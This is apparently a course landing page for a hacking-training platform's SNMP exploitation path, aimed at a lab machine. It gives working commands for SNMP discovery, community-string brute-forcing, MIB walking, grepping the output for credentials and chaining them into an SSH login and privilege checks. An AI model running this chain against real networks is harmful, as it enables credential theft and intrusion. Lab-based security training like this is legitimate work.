RatLabs
⭐ Premium Path · Protocol Exploitation

SNMP Exploitation Mastery

Two modules. Community string discovery to root shell. Walk the full MIB tree, extract credentials from NET-SNMP extend OIDs, and chain directly into SSH — all against a live machine.

2Modules
1Machine
Premium
Get Started →

The SNMP Attack Methodology

SNMP is UDP — missed by every TCP-only scanner. These four steps take you from discovery to root.

Phase 1 — UDP Discovery

SNMP is UDP/161. A TCP-only nmap scan returns nothing. Always include -sU -p 161 in your initial reconnaissance pass.

nmap -sU -p 161 TARGET
nmap -sU -p 161 \
  --script snmp-info TARGET

Phase 2 — Community String

Default community string is public. Brute-force others with onesixtyone if public fails — but try common strings manually first.

onesixtyone -c \
  /usr/share/seclists/Discovery/SNMP/snmp.txt \
  TARGET

Phase 3 — Full MIB Walk

Dump the entire OID tree and save it. You will grep it repeatedly. The NET-SNMP extend branch is the credential goldmine.

snmpwalk -v2c -c public \
  TARGET .1.3.6 > /tmp/mib.txt
wc -l /tmp/mib.txt

Phase 4 — Extract & Chain

Parse the saved output for credential fragments. Correlate sysContact (username) with extend output (password). SSH in and escalate.

grep -iE 'pass|user|key|cred' \
  /tmp/mib.txt
ssh USER@TARGET
sudo -l

The Two Modules

Complete Module 1 before Module 2. Both target the same machine — Walkabout.

Module 1 · 📡

SNMP — MIB Walking & Community String Discovery

SNMP runs on UDP/161 and is invisible to TCP-only scans. With the default community string 'public', a full MIB walk hands you the running process list, installed software, network interfaces, routing tables, and — often — clear-text credentials stored in OID values.

  • nmap -sU -p 161 --script snmp-info,snmp-sysdescr TARGET (UDP discovery)
  • snmpwalk -v2c -c public TARGET .1.3.6 (full MIB dump, OID tree root)
  • snmpwalk -v2c -c public TARGET system (system OID: sysDescr, sysName, sysLocation)
  • onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt TARGET (community brute-force)
  • snmp-check TARGET -c public (human-readable output, parses common OIDs)
  • braa TARGET:public:.1.3.6.* (fast multi-target SNMP sweep)
  • Navigating the MIB tree: .1.3.6.1.2.1.1 (system), .1.3.6.1.2.1.25 (host), .1.3.6.1.4.1 (enterprise)
  • NET-SNMP extend OID: .1.3.6.1.4.1.8072.1.3.2 (user-defined extensions — credential goldmine)
Tools: snmpwalksnmp-checkonesixtyonebraanmap
Walkabout
🔒
Premium Content

Hands-on assignments for this module are available to Premium members.

⭐ Unlock Premium
Module 2 · 🚪

SNMP — Credential Extraction & Foothold

SNMP data alone is not a shell. The skill is in parsing: correlating a username from sysContact, a password from a NET-SNMP extend value, and using those together on SSH. Learn to extract signal from thousands of OID lines — fast.

  • Grepping SNMP output: snmpwalk ... | grep -iE 'pass|user|cred|key|secret|login'
  • NET-SNMP extend credential leak: parsing .1.3.6.1.4.1.8072.1.3.2.3.1.2 values
  • Correlating sysContact / sysLocation / sysName for username hints
  • Using snmpwalk with -Oa (print as ASCII) for human-readable string OIDs
  • snmpget for targeted OID reads: snmpget -v2c -c public TARGET OID
  • SNMP v3 username enumeration: auxiliary/scanner/snmp/snmp_enumusers (Metasploit)
  • Converting OID decimal to human-readable with MIB files: -m ALL flag
  • Full chain: snmpwalk → grep credentials → ssh USER@TARGET
Tools: snmpwalksnmpgetsnmp-checkmetasploitssh
🔒
Premium Content

Hands-on assignments for this module are available to Premium members.

⭐ Unlock Premium